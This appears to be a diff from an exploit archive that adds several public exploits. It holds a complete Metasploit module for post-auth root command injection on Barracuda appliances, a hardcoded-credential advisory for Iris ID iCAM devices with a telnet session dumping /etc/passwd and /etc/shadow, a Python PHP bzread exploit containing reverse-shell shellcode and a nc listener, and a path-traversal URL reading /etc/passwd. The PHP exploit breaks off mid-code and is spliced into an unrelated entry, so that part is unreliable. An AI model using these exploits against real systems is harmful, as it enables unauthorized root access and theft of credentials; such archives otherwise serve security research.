+|
+...
+
diff --git a/platforms/linux/remote/40162.rb b/platforms/linux/remote/40162.rb
new file mode 100755
index 000000000..431fba7f2
--- /dev/null
+++ b/platforms/linux/remote/40162.rb
@@ -0,0 +1,297 @@
+# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)
+# Date: 07/25/16
+# Exploit Author: xort xort@blacksecurity.org
+# Vendor Homepage: https://www.barracuda.com/
+# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
+# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)
+# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
+# CVE : None.
+
+# This exploit combines 2 bugs to leverage root access
+# Vuln 1: ondefined_view_template trigger - File upload vuln
+# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
+ by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File
+ Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean
+ up left-over core files on the device to execute them. By sending a specially crafted requests
+ it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
+ },
+
+ 'Author' =>
+ [
+ 'xort', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 2 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
+ }
+ ],
+
+ ['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
+ }
+ ],
+ ],
+
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('ET', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(8000),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear, et)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+ enc_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-mod/index.cgi",
+ 'headers' =>
+ {
+ 'Accept' => "application/json, text/javascript, */*; q=0.01",
+ 'Content-Type' => "application/x-www-form-urlencoded",
+ 'X-Requested-With' => "XMLHttpRequest"
+ },
+ 'vars_post' =>
+ {
+
+ 'enc_key' => enc_key,
+ 'et' => et,
+ 'user' => "admin", # username,
+ 'password' => "admin", # password_clear,
+ 'enctype' => "none",
+ 'password_entry' => "",
+ 'login_page' => "1",
+ 'login_state' => "out",
+ 'real_user' => "",
+ 'locale' => "en_US",
+ 'form' => "f",
+ 'Submit' => "Sign in",
+ }
+ }, timeout)
+
+ # get rid of first yank
+ password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
+ et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
+
+ return password, et
+ end
+
+ def run_command(username, password, et, cmd)
+ vprint_status( "Running Command...\n" )
+
+ # file to overwrite
+ cmd_file = "/home/product/code/config/corefile_list.txt"
+
+ # file to replace
+ sudo_cmd_exec = target['SudoCmdExec']
+
+ sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
+ sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
+
+ # random filename to dump too + 'tmp' HAS to be here.
+ b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
+
+ # decoder stubs - tells 'base64' command to decode and dump data to temp file
+ b64decode1 = "echo \""
+ b64decode2 = "\" | base64 -d >" + b64dumpfile
+
+ # base64 - encode with base64 so we can send special chars and multiple lines
+ cmd = Base64.strict_encode64(cmd)
+
+ # Create injection string.
+ # a) package the base64 decoder with encoded bytes
+ # b) attach a chmod +x request to make the script created (b64dumpfile) executable
+ # c) execute decoded base64 dumpfile
+
+ injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
+
+ exploitreq = [
+ [ "auth_type","Local" ],
+ [ "et",et ],
+ [ "locale","en_US" ],
+ [ "password", password ],
+ [ "primary_tab", "BASIC" ],
+ [ "realm","" ],
+ [ "secondary_tab","reports" ],
+ [ "user", username ],
+ [ "timestamp", Time.now.to_i ],
+
+ [ "upload_template_file_filename", "admin" ]
+ ]
+
+
+ boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
+ post_data = ""
+
+ exploitreq.each do |xreq|
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
+ post_data << "#{xreq[1]}\r\n"
+ end
+
+ # upload file
+ up_filename = cmd_file
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"
+ post_data << ";#{injection_string};\r\n"
+
+ # end data
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"
+ post_data << "\r\n"
+
+ post_data << "--#{boundary}--\r\n" # end boundary
+
+ # upload file vuln
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-mod/index.cgi",
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_data,
+ 'headers' =>
+ {
+ 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
+ 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ 'Accept-Language' => "en-US,en;q=0.5"
+ }
+ })
+
+ post_data = ""
+
+ exploitreq.each do |xreq|
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
+ post_data << "#{xreq[1]}\r\n"
+ end
+
+ # triger vuln
+ post_data << "--#{boundary}\r\n"
+ post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"
+ post_data << "\r\n"
+
+ post_data << "--#{boundary}--\r\n" # end boundary
+
+ # upload file vuln
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-mod/index.cgi",
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'data' => post_data,
+ 'headers' =>
+ {
+ 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
+ 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ 'Accept-Language' => "en-US,en;q=0.5"
+ }
+ })
+
+
+
+ end
+
+ def run_script(username, password, et, cmds)
+ vprint_status( "running script...\n")
+
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ user = "admin"
+
+ # params
+ real_user = "";
+ login_state = "out"
+ et = Time.now.to_i
+ locale = "en_US"
+ user = "admin"
+ password = "admin"
+ enctype = "MD5"
+ password_entry = ""
+ password_clear = "admin"
+
+
+ password_hash, et = do_login(user, password_clear, et)
+ vprint_status("new password: #{password_hash} et: #{et}\n")
+
+ sleep(5)
+
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
+
+ handler
+ end
+
+
+ end
+
+end
diff --git a/platforms/linux/remote/40167.txt b/platforms/linux/remote/40167.txt
new file mode 100755
index 000000000..ffc5ac505
--- /dev/null
+++ b/platforms/linux/remote/40167.txt
@@ -0,0 +1,205 @@
+
+Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
+
+
+Vendor: Iris ID, Inc.
+Product web page: http://www.irisid.com
+ http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
+ http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
+ http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
+ http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/
+
+Affected version: iCAM4000:
+ iCAM Software: 3.09.02
+ iCAM File system: 1.3
+ CMR Firmware: 5.5 and 3.8
+ EIF Firmware: 9.5 and 8.0
+ HID iClass Library: 2.01.05
+ ImageData Library: 1.153
+ Command Process: 1.02
+
+ iCAM7000:
+ iCAM Software: 8.01.07
+ iCAM File system: 1.4.0
+ EIF Firmware: 1.9
+ HID iClass Library: 1.00.00
+ ImageData Library: 01.01.32
+ EyeSeek Library: 5.00
+ Countermeasure Library: 3.00
+ LensFinder Library: 5.00
+ Tilt Assist Library: 4.00
+
+Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
+by Iris ID provides fast, secure, and highly accurate, non-contact identification
+by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
+integration with many Wiegand and network based access control, time and attendance,
+visitor management and point of sale applications.
+
+The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
+4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
+iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
+wall-mount is used.
+
+Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
+When visiting the device interface with a browser on port 80, the application loads an applet
+JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
+JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
+privileges on the affected node. An attacker can access the device using these credentials
+starting a simple telnet session on port 23 gaining access to sensitive information and/or
+FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.
+
+=====================================================================================
+
+/html/ICAMClient.jar (ICAMClient.java):
+---------------------------------------
+
+97: param_host = getParameter("host");
+98: param_user = "rou";//getParameter("user");
+99: param_pass = "iris4000";//getParameter("pass"); // password
+100: param_path = getParameter("path"); // path on the server
+
+
+/etc/ftpd/ftpd.conf:
+--------------------
+
+69: # User list:
+70: # Format: user=
+71: # user name
+72: # password or * for anonymous access
+73: # (internally appended to serverroot)
+74: # the user has access to the WHOLE SUBTREE,
+75: # if the server has access to it
+76: # maximal logins with this usertype
+77: # D - download
+78: # U - upload + making directories
+79: # O - overwrite existing files
+80: # M - allows multiple logins
+81: # E - allows erase operations
+82: # A - allows EVERYTHING(!)
+101:
+103: user=rou iris4000 / 5 A
+
+=====================================================================================
+
+
+Tested on: GNU/Linux 2.4.19 (armv5tel)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5347
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
+
+
+06.05.2016
+
+--
+
+
+telnet [IP]
+iCAM4000 login: rou
+Password:
+[rou@iCAM4000 rou]# id
+uid=500(rou) gid=500(rou) groups=500(rou)
+[rou@iCAM4000 rou]# cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:
+daemon:x:2:2:daemon:/sbin:
+adm:x:3:4:adm:/var/adm:
+lp:x:4:7:lp:/var/spool/lpd:
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:
+news:x:9:13:news:/var/spool/news:
+uucp:x:10:14:uucp:/var/spool/uucp:
+operator:x:11:0:operator:/root:
+games:x:12:100:games:/usr/games:
+gopher:x:13:30:gopher:/usr/lib/gopher-data:
+ftp:x:14:50:FTP User:/home/ftp:
+nobody:x:99:99:Nobody:/:
+rou:x:500:500::/home/rou:/bin/bash
+[rou@iCAM4000 rou]# cd /web
+[rou@iCAM4000 /web]# ls -al
+total 0
+drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .
+drwxr-xr-x 1 root root 0 Jan 1 1970 ..
+drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin
+drwxrwxr-x 1 rou rou 0 Jan 31 2013 html
+drwxrwxr-x 1 rou rou 0 Jan 31 2013 images
+[rou@iCAM4000 /web]# cat /etc/shadow
+root:{{REMOVED}}
+bin:*:10897:0:99999:7:::
+daemon:*:10897:0:99999:7:::
+adm:*:10897:0:99999:7:::
+lp:*:10897:0:99999:7:::
+sync:*:10897:0:99999:7:::
+shutdown:*:10897:0:99999:7:::
+halt:*:10897:0:99999:7:::
+mail:*:10897:0:99999:7:::
+news:*:10897:0:99999:7:::
+uucp:*:10897:0:99999:7:::
+operator:*:10897:0:99999:7:::
+games:*:10897:0:99999:7:::
+gopher:*:10897:0:99999:7:::
+ftp:*:10897:0:99999:7:::
+nobody:*:10897:0:99999:7:::
+rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
+[rou@iCAM4000 /web]# cat /etc/issue
+
+Iris@ID iCAM4000 Linux (experimental)
+Kernel 2.4.19-rmk7-pxa1 on an armv5tel
+[rou@iCAM4000 /web]# ls -al html/
+total 289
+drwxrwxr-x 1 rou rou 0 Jan 31 2013 .
+drwxrwxr-x 1 rou rou 0 Jul 26 07:22 ..
+-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm
+-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar
+-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm
+-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm
+-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm
+-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm
+-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm
+-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm
+-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm
+-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm
+-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm
+-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm
+-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm
+-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm
+-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm
+-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm
+-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm
+-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm
+-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm
+-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm
+-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm
+-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm
+-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm
+-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm
+-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm
+-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm
+-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm
+-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm
+-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm
+-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm
+-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm
+-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm
+-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm
+-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm
+-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm
+[rou@iCAM4000 /web]# echo $SHELL
+/bin/bash
+[rou@iCAM4000 /web]# echo pwn > test.write
+[rou@iCAM4000 /web]# cat test.write
+pwn
+[rou@iCAM4000 /web]# rm -rf test.write
+[rou@iCAM4000 /web]# cd /etc/ftpd
+[rou@iCAM4000 ftpd]# pwd
+/etc/ftpd
+[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
+user=rou iris4000 / 5 A
+[rou@iCAM4000 ftpd]# ^D
+Connection to host lost.
diff --git a/platforms/php/dos/40155.txt b/platforms/php/dos/40155.py
similarity index 58%
rename from platforms/php/dos/40155.txt
rename to platforms/php/dos/40155.py
index 64b634900..8b53ead49 100755
--- a/platforms/php/dos/40155.txt
+++ b/platforms/php/dos/40155.py
@@ -1,3 +1,4 @@
+'''
PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in
its `bzread()' function:
@@ -321,4 +322,212 @@ _________
[3] [https://bugs.php.net/bug.php?id=72613]
--- Hans Jerry Illikainen
\ No newline at end of file
+-- Hans Jerry Illikainen
+'''
+#!/usr/bin/env python
+#
+# PoC for CVE-2016-5399 targeting FreeBSD 10.3 x86-64 running php-fpm
+# behind nginx.
+#
+# ,----
+# | $ nc -v -l 1.2.3.4 5555 &
+# | Listening on [1.2.3.4] (family 0, port 5555)
+# |
+# | $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
+# | [*] sending archive to http://target/upload.php (0)
+# |
+# | Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
+# | $ fg
+# | id
+# | uid=80(www) gid=80(www) groups=80(www)
+# |
+# | uname -imrsU
+# | FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000
+# |
+# | /usr/sbin/pkg query -g "=> %n-%v" php*
+# | => php70-7.0.8
+# | => php70-bz2-7.0.8
+# |
+# | cat upload.php
+# |
+# `----
+#
+# - Hans Jerry Illikainen
+#
+import argparse
+import socket
+from struct import pack
+
+import requests
+import bitstring
+
+# reverse shell from metasploit
+shellcode = [
+ "\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f"
+ "\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48\x31\xf6"
+ "\x56\x48\xbe\x00\x02%(port)s%(ip)s\x56\x48\x89\xe6\x6a\x10"
+ "\x5a\x0f\x05\x4c\x89\xe7\x6a\x03\x5e\x48\xff\xce\x6a\x5a\x58"
+ "\x0f\x05\x75\xf6\x31\xc0\x83\xc0\x3b\xe8\x08\x00\x00\x00\x2f"
+ "\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52"
+ "\x57\x48\x89\xe6\x0f\x05"
+]
+
+# we're bound by the MTF and can only reuse values on the stack
+# between pos[0]..pos[255]
+selectors = [
+ # retaddr:
+ # 0x8009c9462: lea rsp,[rbp-0x20]
+ # 0x8009c9466: pop rbx
+ # 0x8009c9467: pop r12
+ # 0x8009c9469: pop r14
+ # 0x8009c946b: pop r15
+ # 0x8009c946d: pop rbp
+ # 0x8009c946e: ret
+ #
+ # from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3)
+ 9, 10, 11, 18, 1, 88, 31, 127,
+
+ # rbp:
+ # 0x802974300 (close to the end of the stream)
+ 16, 17, 18, 29, 22, 152, 159, 25,
+
+ # push it back
+ 17, 18, 19, 20, 21, 22, 23, 24,
+ 25, 26, 27, 28, 29, 30, 31, 32,
+ 33, 34, 35, 36, 37, 38, 39, 40,
+ 41, 42, 43, 44, 45, 46, 47, 48,
+ 49, 50, 51, 52, 53, 54, 55, 56,
+ 57, 58, 59, 60, 61, 62
+]
+
+payload = [
+ # addr
+ #
+ # 0x41c4c8: pop rdi
+ # 0x41c4c9: ret
+ pack("$fname";
+
+
+This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
+
+Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
+
+
+Proof Of Concept
+================
+
+PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
+
|